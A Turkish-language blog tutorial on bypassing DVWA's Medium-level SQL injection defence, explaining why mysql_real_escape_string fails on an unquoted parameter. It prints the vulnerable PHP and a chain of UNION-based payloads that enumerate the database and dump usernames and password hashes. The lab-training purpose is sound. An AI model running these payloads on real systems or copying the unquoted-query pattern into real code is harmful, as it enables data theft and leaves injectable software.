Ders 16 - SQL Injection (Medium Level)

Bu yazıda güvenlik düzeyi Medium seviyesine yükseltilmiş DVWA'nın SQL Injection'a karşı aldığı önlem incelenecektir.

Dersin Hedefi

Medium seviyesindeki güvenliği aşın ve yine SQL Injection yapın.

SQL Injection'a Karşı Önlem

Eğer önceki yazıları okumuşsanız artık biliyorsunuz ki SQL Injection yapıp yapamayacağımıza tırnak karakterini uygulamaya göndererek hata verip vermemesine göre saptayabiliyoruz. Önceki derslerde yapılan SQL Injection aşağıdaki kaynak kod yüzünden yapılabiliyordu:

<?php 

if( isset( $_REQUEST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_REQUEST[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysql_query( $query ) or die( '' . mysql_error() . '' );

    // Get results 
    $num = mysql_numrows( $result ); 
    $i   = 0; 
    while( $i < $num ) { 
        // Get values 
        $first = mysql_result( $result, $i, "first_name" ); 
        $last  = mysql_result( $result, $i, "last_name" ); 

        // Feedback for end user 
        echo "ID: {$id}
First name: {$first}
Surname: {$last}"; 

        // Increase loop count 
        $i++; 
    } 

    mysql_close(); 
} 

?>

5. satırda kullanıcıdan gelen veri $id değişkenine atanmaktadır. 8.satırda $id değişkeni SQL sorgusunda kullanılmaktadır. İşte güvenlik zafiyeti bu satırdan kaynaklanmaktadır. $id değişkeni hiçbir denetlemeye tabi tutulmadan direk SQL sorgusuna dahil edilmiş. $id değişkeni içindeki sakıncalı karakterlerden ayıklanmadan SQL sorgusuna dahil edildiği için biz tırnak kullanımının avantajından faydalanabildik ve SQL Injection yapabildik. Bir de güvenlik Medium seviyesine çıktığında kaynak koddaki değişime göz atalım:

<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 
    $id = mysql_real_escape_string( $id ); 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysql_query( $query ) or die( '' . mysql_error() . '' );

    // Get results 
    $num = mysql_numrows( $result ); 
    $i   = 0; 
    while( $i < $num ) { 
        // Display values 
        $first = mysql_result( $result, $i, "first_name" ); 
        $last  = mysql_result( $result, $i, "last_name" ); 

        // Feedback for end user 
        echo "ID: {$id}
First name: {$first}
Surname: {$last}"; 

        // Increase loop count 
        $i++; 
    } 

    //mysql_close(); 
} 

?>

Görüldüğü üzere 6. satırda mysql sorguları için bir anlam ifade eden karakterlerin önüne ters slash koyan mysql_real_escape_string() fonksiyonu kullanılmış. mysql_real_escape_string() fonksiyonu SQL sorguları için anlam ifade eden karakterlerin önüne ters slash işareti koyarak o anlam ifaden karakterin sql için olan anlamını yok edecektir ve stringleştirecektir. Bu ciddi bir güvenlik önlemidir. Şimdi 9. satıra dikkat edelim. Fark ettiyseniz $id değişkeni SQL sorgusuna tırnak kullanılmadan dahil edilmiş. Maalesef bu kullanım 6. satırdaki mysql_real_escape_string() fonksiyonunun temin ettiği güvenliği al aşağı edecektir. Çünkü kullanıcı gireceği sql injection kodlarına tırnak eklemek mecburiyetinde kalmayacaktır. Dolayısıyla tırnağın önüne ters slash koyan mysql_real_escape_string() fonksiyonu ters slash koyacak bir tırnak bulamayacaktır. Tırnaksız sql injection kodu da PHP'nin esnekliği sayesinde kusursuzca çalışacaktır. Sonuç olarak güvenlik aşılmış ve sql injection saldırısında bulunulmuş olunacaktır. Şimdi pratik üzerinden gidelim ve olayı biraz somutlaştıralım.

Öncelikle girilecek enjeksiyon kodları bu güvenlik seviyesi gereği farklı şekilde ekrana girilecektir. Ekranda bir comboBox göreceksiniz:

ComboBox'lar arayüzden veri girilmesine izin vermezler. Yazının ileri kısımlarında bahsedilecek enjeksiyon kodlarını sırası geldiğinde ekrana girebilmek için comboBox'a sağ tıklayın ve Öğeyi Denetle (Inspect Element) seçeneğine tıklayın. Bunun üzerine tarayıcınızın alt tarafında küçük bir pencere açılacaktır. O pencerede mavi renkle seçili bir satır göreceksiniz. O satırın başındaki üçgene basarak satırı genişletin.

Açılan seçeneklerden value'su 1 olanın (value="1") tırnaklarının içerisindeki 1'e çift tıklayın. Aşağıda ne zaman bir SQL Injection kodu verilirse bu çift tıkladığınız yerdeki 1'i silip yerine enjeksiyon kodunu koyun ve ardından ENTER yaptıktan sonra ekrandaki Submit butonuna basın. Bu kopyala, yapıştır, ENTER ve Submit olayını her enjeksiyon kodu için tekrarlayın.

Şimdi SQL Injection kodlamalarına geçelim. Öncelikle prosedür gereği SQL Injection açığı var mı yok muyu bir test edelim:

Metin Kutusuna Girilecek Kod (Tek tırnak):
'

Ekran aldığı tek tırnak sonrası hata verecektir. Normalde şunu düşünmeniz gerekir: mysql_real_escape_string() fonksiyonu tırnakların önüne ters slash koyduğuna göre, yani tırnak karakterini SQL komutu olmaktan çıkarıp string'leştirdiğine göre niye girdiğimiz tırnak hata verdirdi? Bunun nedeni ters slash'ın da bir ters slash'a ihtiyaç duyuyor oluşundandır. Ters slash'a ters slash ekleme işlemi gerçekleştirilmediğinden tek tırnak string'leşemeyecektir ve yine hata verilmesine sebebiyet verecektir. Yani sonuç olarak hedef sayfa halen SQL Injection açığını barındırmaktadır. Şimdi aşağıda alt alta verilmiş olan SQL Injection (Low Level) dersinde detaylı olarak anlattığımız saldırı teşebbüslerini sırasıyla F12 yapıp value="1" 'in 1 değeri yerine girin, ENTER'layın ve Submit'leyin.

99 or 1 = 1 # 99 or 1 = 1 ORDER BY 1 # 99 or 1 = 1 ORDER BY 2 # 99 or 1 = 1 ORDER BY 3 # 99 or 1 = 1 UNION Select 1,2 # 99 or 1 = 1 UNION Select 1,version() # 99 or 1 = 1 UNION Select 1,schema_name from information_schema.schemata # 99 or 1 = 1 UNION Select 1,group_concat(schema_name) from information_schema.schemata # 99 or 1 = 1 UNION Select 1,group_concat(table_name) from information_schema.tables Where table_schema='dvwa' # 99 or 1 = 1 UNION Select 1,group_concat(column_name) from information_schema.columns Where table_name='users' # 99 or 1 = 1 UNION Select 1,group_concat(user,0x3b,password,0x0a) from dvwa.users #

NOT: Yukarıdaki kodlar Low Level'daki enjeksiyon kodlarının tırnaksız halleridir. Çünkü Medium Level'daki SQL kullanımı tırnaksızdır.

Böylelikle Medium Level güvenliğinde dahi hedef sitenin admin kullanıcısının şifresine erişebilmiş olursunuz.

Bu yazı 17.01.2016 tarihinde, saat 16:10:06'de yazılmıştır. 17.01.2016 tarihi ve 17:58:41 saatinde ise güncellenmiştir.

Yazar : Hasan Fatih ŞİMŞEK

Görüntülenme Sayısı : 2184

Yorumlar

Henüz yorum girilmemiştir.

Yorum Ekle

	#Kategoriler
	->	Genel
	->	Webgoat Uygulaması
	->	DVWA Uygulaması
	->	Çeşitli Sızma Teknikleri
	->	Güvenlik Araçları
	->	Linux Temelleri
	->	Genel Kültür (Siber Güvenlik)

#Popüler Yazılar
	->	Faz Açısını Hesaplama
	->	Hub, Switch, Router, Modem, Gateway ve Access Point Farkları
	->	Ders 12 - Ajax Security > DOM-Based cross-site scripting
	->	BGA Sınav Soruları 2016
	->	GET ile POST Arasındaki Fark

#En Son Yazılar
	->	Siber Güvenlikte Düşük Seviye Açıklık Nedir
	->	Haberleşme Teknolojisi
	->	Oyun Motoru Nedir
	->	Arp Spoofing İlave Uygulamalar
	->	Arp Spoofing Saldırısı Nedir ve Nasıl Yapılır

#Arşiv
	► 2014 ► Ekim (1) • Blog Maceram Başlar ► Kasım (7) • Parazit ve Gürültü Arasındaki Fark Nedir? • Stack ve Heap Arasındaki Fark • Sinyal Denkleminin Anlamı • Periyot ve Frekans Nedir? • Faz Açısını Hesaplama • Üniversite Öğrencilerinin Sağlık Aktivasyonu • Nesne Yönelimli Programlama Nedir ► Aralık (3) • Skype'ta Birbirimizin Sesini Nasıl Duyuyoruz? • Hub, Switch, Router, Modem, Gateway ve Access Point Farkları • Askerlikle İlgili Sorular ► 2015 ► Ocak (1) • Dev Firmaların Mülakatlarda Sorduğu 15 Çetin Soru ► Şubat (4) • Yapay Zeka İnsanı Geçemez • Webgoat Nedir? • Ubuntu 14.04 LTS Linux'a Webgoat Kurulumu • Windows'a Webgoat Kurulumu ► Mart (1) • Ders 1 - Introduction(Giriş) ► Nisan (3) • Ders 2 - General > Http Basics • Ders 3 - General > Http Split • Ders 4 - Access Control Flaws > Using an Access Control Matrix ► Mayıs (7) • Ders 5 - Access Control Flaws > Bypass a Path Based Access Control Scheme • Ders 6 - Role Based Access Control > Stage 1 • Ders 7 - Role Based Access Control > Stage 2 • Ders 8 - Role Based Access Control > Stage 3 • Ders 9 - Role Based Access Control > Stage 4 • Ders 10 - Access Control Flaws > Remote Admin Access • Ders 11 - Ajax Security > Same Origin Policy Protection ► Haziran (4) • Ders 12 - Ajax Security > DOM-Based cross-site scripting • Ders 13 - Ajax Security > Client Side Filtering • GET ile POST Arasındaki Fark • Ders 14 - Ajax Security > DOM Injection ► Temmuz (7) • Ders 15 - Ajax Security > XML Injection • Ders 16 - Ajax Security > JSON Injection • Ders 17 - Ajax Security > Silent Transactions Attacks • UML Sınıf Diyagramları • UML Sınıf Diyagramı İlişkileri • Association vs. Aggregation vs. Composition • Ders 18 - Ajax Security > Dangerous Use of Eval ► Ağustos (2) • Ders 19 - Ajax Security > Insecure Client Storage • Ders 20 - Authentication Flaws > Password Strength ► Eylül (11) • Ders 21 - Authentication Flaws > Forgot Password • Ders 22 - Authentication Flaws > Basic Authentication • Ders 23 - Authentication Flaws > Multi Level Login 1 • Ders 24 - Authentication Flaws > Multi Level Login 2 • Ders 25 - Buffer Overflows > Off-by-One Overflows • Ders 26 - Code Quality > Discover Clues in the HTML • Ders 27 - Concurrency > Thread Safety Problems • Ders 28 - Concurrency > Shopping Cart Concurrency Flaw • Ders 29 - Cross-Site Scripting (XSS) > Phishing with XSS • Ders 30 - Cross-Site Scripting (XSS) > Stage 1: Stored XSS • Ders 31 - Cross-Site Scripting > Stage 2: Block Stored XSS using Input Validation ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2016 ► Ocak (27) • DVWA Nedir? • Windows'a DVWA Kurulumu • Ubuntu 14.04 LTS Linux'a DVWA Kurulumu • Ders 1 - DVWA'ya Giriş • Ders 2 - Brute Force (Low Level) • Ders 3 - Brute Force (Medium Level) • Ders 4 - Command Injection (Low Level) • Ders 5 - Command Injection (Medium Level) • Ders 6 - Command Injection (High Level) • Ders 7 - Cross Site Request Forgery (Low Level) • Ders 8 - File Inclusion (Low Level) • Ders 9 - File Inclusion (Medium Level) • Ders 10 - File Inclusion (High Level) • Ders 11 - File Upload (Low Level) • Ders 12 - File Upload (Medium Level) • Ders 13 - File Upload (High Level) • Ders 14 - SQL Injection (Low Level) • Ders 15 - SQL Injection (Low Level) II • Ders 16 - SQL Injection (Medium Level) • Ders 17 - Blind SQL Injection (Low Level) • BGA Sınav Soruları 2016 • Ders 18 - Blind SQL Injection (Medium Level) • Ders 19 - Reflected XSS (Low Level) • Ders 20 - Reflected XSS (Medium Level) • Ders 21 - Reflected XSS (High Level) • Ders 22 - Stored XSS (Low Level) • Ders 23 - Stored XSS (Medium Level) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2017 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2018 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (1) • Ve Blog'a Döndüm ► Ekim (0) ► Kasım (6) • Metasploit Framework'e Giriş • Metasploit ile Bir Sızma Uygulaması (ms08-067) • Metasploit Saldırı Aşamaları (Özet) • Metasploit Komutları • Metasploit Detay Bilgiler • Metasploit Detay Bilgiler (Özet) ► Aralık (0) ► 2019 ► Ocak (0) ► Şubat (0) ► Mart (2) • Arp Spoofing Saldırısı Nedir ve Nasıl Yapılır • Arp Spoofing İlave Uygulamalar ► Nisan (0) ► Mayıs (0) ► Haziran (1) • Oyun Motoru Nedir ► Temmuz (1) • Haberleşme Teknolojisi ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ▼ 2020 ► Ocak (1) • Siber Güvenlikte Düşük Seviye Açıklık Nedir

#Giriş

	ID	:
	Şifre	: